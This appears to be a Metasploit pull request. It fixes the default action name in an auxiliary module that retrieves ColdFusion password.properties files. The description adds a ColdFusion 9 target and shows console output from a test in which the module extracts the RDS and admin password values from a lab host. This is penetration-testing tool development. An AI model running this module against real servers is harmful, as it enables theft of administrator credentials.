### PR TITLE
Add Coldfusion 9 target, OSVDB ref and review

### DIFF
--- a/modules/auxiliary/gather/coldfusion_pwd_props.rb
+++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
 					['ColdFusion10'],
 					['ColdFusion9']
 				],
-			'DefaultAction' => 'ColdFusion 10',
+			'DefaultAction' => 'ColdFusion10',
 			'DisclosureDate' => "May 7 2013"  #The day we saw the subzero poc
 		))
 


### PR DESCRIPTION
Hi @wchen-r7

this pull request references https://github.com/rapid7/metasploit-framework/pull/1822

Since atm I just had a coldfusion 9 ready to test added the coldfusion 9 target. I've used actions to allow different target versions on the aux module. Also added the OSVDB ref. If you agree with changes, just land this pull request and we're ready to go I guess.

Test coldfusion 9:

```
msf auxiliary(coldfusion_pwd_props) > set action ColdFusion9
action => ColdFusion9
msf auxiliary(coldfusion_pwd_props) > run

[+] 192.168.0.8:8500 - rdspassword = (IJ\=UGblah2,$ \n
[+] 192.168.0.8:8500 - password    = blahblahblah
[+] 192.168.0.8:8500 - encrypted   = true
[+] 192.168.0.8:8500 - password.properties stored in '/Users/juan/.msf4/loot/20130513114559_default_192.168.0.8_coldfusion.passw_601151.txt'
[*] Auxiliary module execution completed

```
